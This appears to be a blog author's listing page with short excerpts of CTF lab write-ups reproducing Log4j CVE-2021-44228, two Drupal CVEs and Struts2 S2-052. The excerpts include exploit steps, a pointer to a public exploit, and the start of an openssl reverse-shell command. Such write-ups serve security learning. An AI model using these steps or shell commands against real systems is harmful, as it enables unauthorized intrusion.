![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
一心一易一
这个作者很懒,什么都没留下…
展开
-
登陆不了 CTFshow
登陆不了 CTFshow参考文档原创 2022-03-31 21:55:02 · 565 阅读 · 0 评论 -
[Log4j]CVE-2021-44228 CTFshow
Log4j复现 CTFshow复现参考文档1复现参考文档2环境http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/2.0 <= Apache log4j2 <= 2.14.1简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式原创 2022-03-31 17:50:19 · 3565 阅读 · 0 评论 -
[Drupal]CVE-2019-6339 BUUCTF
[Drupal]CVE-2019-6339参考文档前期准备还是和之前一样,语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用找到管理员资料头像上传处Drupal 的图片默认存储位置为 /sites/default/files/pictures//,默认存储名称为其原来的名称/admin/config/media/file-system处设置临时目录phar://./sites/default/files/pictures/202原创 2022-03-29 18:41:11 · 237 阅读 · 1 评论 -
[Drupal]CVE-2018-7600 BUUCTF
[Drupal]CVE-2018-7600 BUUCTF前期准备进入之后环境安装语言选english,因为没有mysql环境,所以安装的时候可以选择sqlite数据库,其他默认下一步利用直接使用网上公开的exp https://github.com/a2u/CVE-2018-7600将exp里的命令换成env即可反弹会话可参考我上一篇文章,ssl反弹shell...原创 2022-03-29 17:30:53 · 4565 阅读 · 0 评论 -
[struts2]s2-052 BUUCTF
[struts2]s2-052 BUUCTF参考文档本地检测python struts-pwn.py --url "http://node4.buuoj.cn:29619/orders/3/edit"vps使用openssl生成生成证书的公私钥对openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes在自己的vps上创建一个openssl反弹会话的脚本mkfifo /tmp/s; /b原创 2022-03-29 13:42:52 · 3697 阅读 · 0 评论